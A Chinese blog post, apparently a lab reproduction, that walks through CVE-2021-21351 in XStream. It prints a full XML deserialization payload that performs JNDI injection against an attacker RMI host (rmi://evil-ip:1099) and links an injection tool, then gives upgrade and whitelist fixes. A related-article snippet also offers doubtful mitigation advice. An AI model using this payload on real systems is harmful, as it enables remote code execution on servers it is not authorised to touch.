XStream 反序列化命令执行漏洞复现(CVE-2021-21351)

最新推荐文章于 2024-06-27 07:16:34 发布
最新推荐文章于 2024-06-27 07:16:34 发布
阅读量542 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45071708/article/details/130247380
版权

XStream 反序列化命令执行漏洞(CVE-2021-21351)

漏洞原理

XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。
XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令。

环境搭建

docker-compose搭建漏洞环境
docker-compose.yml配置
在这里插入图片描述
docker ps查看启动的容器
在这里插入图片描述
访问查看是否正常启动,如下则为正常启动
在这里插入图片描述

漏洞复现

1.bp抓包查看是否正常
在这里插入图片描述

2.使用JNDI注入工具,启动JNDI服务器,如下为基于SpringBoot漏洞利用工具的RMI地址:rmi://192.168.153.1:1099/sxsyfi
JNDI注入工具:https://github.com/welk1n/JNDI-Injection-exploit/
在这里插入图片描述
3.构造请求包内容如下,内容中的rmi://evil-ip:1099/example替换成上面生成的RMI地址:rmi://192.168.153.1:1099/sxsyfi

<sorted-set>
 <javax.naming.ldap.Rdn_-RdnEntry>

  <type>ysomap</type>
  <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
   <m__DTMXRTreeFrag>
     <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
      <m__size>-10086</m__size>
      <m__mgrDefault>
       <__overrideDefaultParser>false</__overrideDefaultParser>
       <m__incremental>false</m__incremental>
       <m__source__location>false</m__source__location>
       <m__dtms>
        <null/>
       </m__dtms>
       <m__defaultHandler/>
      </m__mgrDefault>
      <m__shouldStripWS>false</m__shouldStripWS>
      <m__indexing>false</m__indexing>
      <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
       <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
        <javax.sql.rowset.BaseRowSet>
          <default>
          <concurrency>1008</concurrency>
          <escapeProcessing>true</escapeProcessing>
          <fetchDir>1000</fetchDir>
          <fetchSize>0</fetchSize>
          <isolation>2</isolation>
          <maxFieldSize>0</maxFieldSize>
          <maxRows>0</maxRows>
          <queryTimeout>0</queryTimeout>
          <readOnly>true</readOnly>
          <rowSetType>1004</rowSetType>
          <showDeleted>false</showDeleted>
          <dataSource>rmi://evil-ip:1099/example</dataSource>
          <listeners/>
          <params/>
         </default>
        </javax.sql.rowset.BaseRowSet>
        <com.sun.rowset.JdbcRowSetImpl>
         <default/>
        </com.sun.rowset.JdbcRowSetImpl>
       </fPullParserConfig>
       <fConfigSetInput>
        <class>com.sun.rowset.JdbcRowSetImpl</class>
        <name>setAutoCommit</name>
        <parameter-types>
         <class>boolean</class>
        </parameter-types>
       </fConfigSetInput>
       <fConfigParse reference='../fConfigSetInput'/>
       <fParseInProgress>false</fParseInProgress>
      </m__incrementalSAXSource>
      <m__walker>
       <nextIsRaw>false</nextIsRaw>
      </m__walker>
      <m__endDocumentOccured>false</m__endDocumentOccured>
      <m__idAttributes/>
      <m__textPendingStart>-1</m__textPendingStart>
      <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
      <m__pastFirstElement>false</m__pastFirstElement>
     </m__dtm>
     <m__dtmIdentity>1</m__dtmIdentity>
   </m__DTMXRTreeFrag>
   <m__dtmRoot>1</m__dtmRoot>
   <m__allowRelease>false</m__allowRelease>
  </value>
 </javax.naming.ldap.Rdn_-RdnEntry>
 <javax.naming.ldap.Rdn_-RdnEntry>
  <type>ysomap</type>
  <value class='com.sun.org.apache.xpath.internal.objects.XString'>
   <m__obj class='string'>test</m__obj>
  </value>
 </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

构造请求包,并将请求包中的GET改为POST,并发送请求
在这里插入图片描述
目标home目录下出现我们创建的文件CVE-SUCCESS,漏洞复现成功
在这里插入图片描述

修复建议

升级Xstream到最新版本

临时缓解措施

配置XStream的安全框架为允许的类型使用白名单
XStream xstream = new XStream();
//清除现有权限并启动白名单
xstream.addPermission(NoTypePermission.NONE);
//允许一些基础类
xstream.addPermission(NullPermission.NULL);
xstream.addPermission(PrimitiveTypePermission.PRIMITIVES);
xstream.allowTypeHierarchy(Collection.class);
//允许来自同一包的任何类型
xstream.allowTypesByWildcard(new String[] {
Blog.class.getPackage().getName()+“.*”
});
// 允许自定义的业务类
xstream.allowTypesHierarchy(Yewulei.class);
Yewulei yw = (Yewulei)xstream.fromXML(new File(“/tmp/yewu.xml”));

Vitaminapple
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XStream 反序列化远程命令执行漏洞复现(CVE-2021-21351)
weixin_43223153的博客
03-30 5699
XStream 反序列化远程命令执行漏洞复现 1. 漏洞影响版本 XStream <= 1.4.15 2. 环境搭建 安装漏洞靶场vulhub git clone git://github.com/vulhub/vulhub.git 3. 漏洞复现 1 进入到漏洞环境文件夹,启动漏洞环境。 cd /vulhub/xstream/CVE-2021-21351 docker-compose up -d 2 启动好之后,访问靶机的ip加8080端口 3 下载JNDI注入利用工具: 下载地址:https
CVE-2021-21351-Stream 反序列化命令执行漏洞复现
weixin_59086772的博客
12-02 635
今天雨笋教育小编给大家介绍,XStream是一个简单易用的开源java类库,在解析XML文本时使用黑名单机制来防御反序列化漏洞,但之前的版本黑名单存在缺陷所以造成反序列化命令执行错误,下午具体来看一下复现过程吧。 0x00简介 XStream是一个轻量级、简单易用的开源Java类库, 它主要用于将对象序列化成XML(JSON)或反序列化为对象。 0x01漏洞概述 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞, 但是其 1.4.15 及之前版本黑名单存在缺陷, 攻击者可
xstream-cve_2021_21351反序列化漏洞复现
whj_study的博客
01-19 2986
# 漏洞名称: xstream-cve_2021_21351 ## 漏洞简介 * Stream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解
Java 中的序列化安全漏洞梳理(二)
最新发布
weixin_49376454的博客
06-27 922
Java 中的序列化安全漏洞梳理(二)
Xstream漏洞复现CVE-2021-29505)
Ashely的博客
09-24 3109
Vulhub漏洞环境搭建 拉取漏洞镜像 复现漏洞 一、Vulhub漏洞环境搭建 详见文章Vulhub靶场搭建(Centos7) 二、拉取漏洞镜像 1.进入到vulhub/Xstream/CVE-2021-29505目录下,执行 docker-compose up -d 等待拉取镜像。(默认拉取镜像速度很慢,建议换源,可参考https://blog.csdn.net/weixin_30565327/article/details/101108079) 2. ...
XStream反序列化命令执行漏洞复现CVE-2021-29505)
Armandhe的博客
09-13 948
XStream反序列化命令执行漏洞复现CVE-2021-29505) 我复现漏洞姐姐会不会生气啊,不像我只会心疼哥哥
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程
weixin_30871701的博客
09-08 576
Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程 参考文档:  S2-052的POC测试,高危Struts REST插件远程代码执行漏洞(S2-052)   http://blog.csdn.net/xwbk12/article/details/77862527?locationNum=3&fps=1  i春秋的报告...
XStream1.4.16反序列化漏洞CVE-2020-26258、CVE-2020-26259)
05-08
XStream是一个常用的Java对象和XML相互转换的工具。...攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成CVE-2020-26258 SSRF漏洞,以及 CVE-2020-26259 任意文件删除漏洞
腾讯蓝军安全通告|XStream远程代码执行漏洞(CVE-2021-29505).pdf
09-18
XStream远程代码执行漏洞(CVE-2021-29505)】是腾讯蓝军发布的安全通告中的一个重要安全事件,涉及到一个高风险的软件漏洞XStream是一款广泛使用的Java XML序列化库,它允许将Java对象转换为XML格式的数据,反之...
XStream Deserializable Vulnerablity And Groovy CVE-2015-3253漏洞分析
08-08
总的来说,XStream反序列化漏洞与Groovy CVE-2015-3253漏洞的关联在于,XStream在处理反序列化时可能误用Groovy的`MethodClosure`,进而触发任意代码执行。对于开发人员而言,理解和防范此类漏洞至关重要,包括避免...
xstream-1.4.15.jar
01-28
Xstream 是 Java 类库,用来将对象序列化成 XML (JSON) 或反序列化为对象。XStream 是一款开源软件,允许在 BSD 许可证的许可下分发。 0x01 漏洞描述 Xstream上次对CVE-2020-26217处理并不彻底,虽然通过黑名单...
XStream 高危漏洞合集,XStream 组件反序列化漏洞
weixin_45314962的博客
11-27 2164
CVE-2021-29505反序列化代码执行漏洞
XStream 反序列化命令执行漏洞CVE-2021-21351
EC_Carrot的博客
08-21 1099
漏洞简介 XStream是一个轻量级、简单易用的开源Java类库,它主要用于将对象序列化成XML(JSON)或反序列化为对象。 XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞,但是其 1.4.15 及之前版本黑名单存在缺陷,攻击者可利用javax.naming.ldap.Rdn$RdnEntry及javax.sql.rowset.BaseRowSet构造JNDI注入,进而执行任意命令漏洞复现 由于目标环境Java版本高于8u191,所以我们需要使用org.apache.naming.
XStream反序列化漏洞分析
weixin_44825990的博客
11-25 1721
XStream反序列化漏洞分析
安全漏洞XStream 远程代码执行高危漏洞
开着奥迪卖小猪
07-30 2268
老铁们,又来漏洞啦... https://help.aliyun.com/noticelist/articleid/1060033733.html?spm=5176.12809143.sas.63.2cb0QyZfQyZfwl
XStream反序列化漏洞分析二
weixin_44825990的博客
12-13 716
XStream反序列化流程及CVE-2020-26217漏洞分析
CVE-2021-21351 XStream反序列化远程代码执行漏洞
m0_56642842的博客
08-13 2606
0x00 简介 XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。它是一种OXMapping 技术,是用来处理XML文件序列化的框架在将javaBean序列化,或将XML文件反序列化的时候,不需要其它辅助类和映射文件,使得XML序列化不再繁琐。 0x01 漏洞概述 在 1.4.16 版本之前的 XStream 中,存在一个漏洞,允许远程攻击者仅通过操纵处理后的输入流,解组时处理的流包含类型信息以重新创建以前编写的对
【web安全】Spring Boot eureka xstream 反序列化
HBohan的博客
03-13 3533
Eureka 是 Spring Cloud Netflix 模块的子模块,它是 Spring Cloud 对 Netflix Eureka 的二次封装,主要负责 Spring Cloud 的服务注册与发现功能,开发人员只需引入相关依赖和注解轻松将 Spring Boot 与 Eureka 进行整合。
XStream漏洞编号是 CVE-2021-21351的应对措施
06-11
XStream漏洞编号 CVE-2021-21351 是由于 XStream 序列化时对恶意 XML 转换导致的安全漏洞。以下是一些应对措施: 1. 尽可能升级 XStream 的版本到 1.4.16 或更高版本,因为这些版本已经修复了该漏洞。 2. 如果无法升级到最新版本,可以通过在 XStream 实例中禁用 DTD 解析来缓解此漏洞。可以通过以下代码实现: ``` XStream xstream = new XStream(); xstream.ignoreUnknownElements(); ``` 3. 可以通过限制可反序列化的类或使用安全的转换器来减少攻击面。 4. 将 XStream 序列化作为一个不可信的输入,始终对其进行适当的验证和过滤。 5. 使用其他序列化库,例如 Jackson 或 Gson,来代替 XStream。 以上是一些常见的应对措施,但实际上解决此漏洞的最好方法是升级 XStream 到最新版本。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值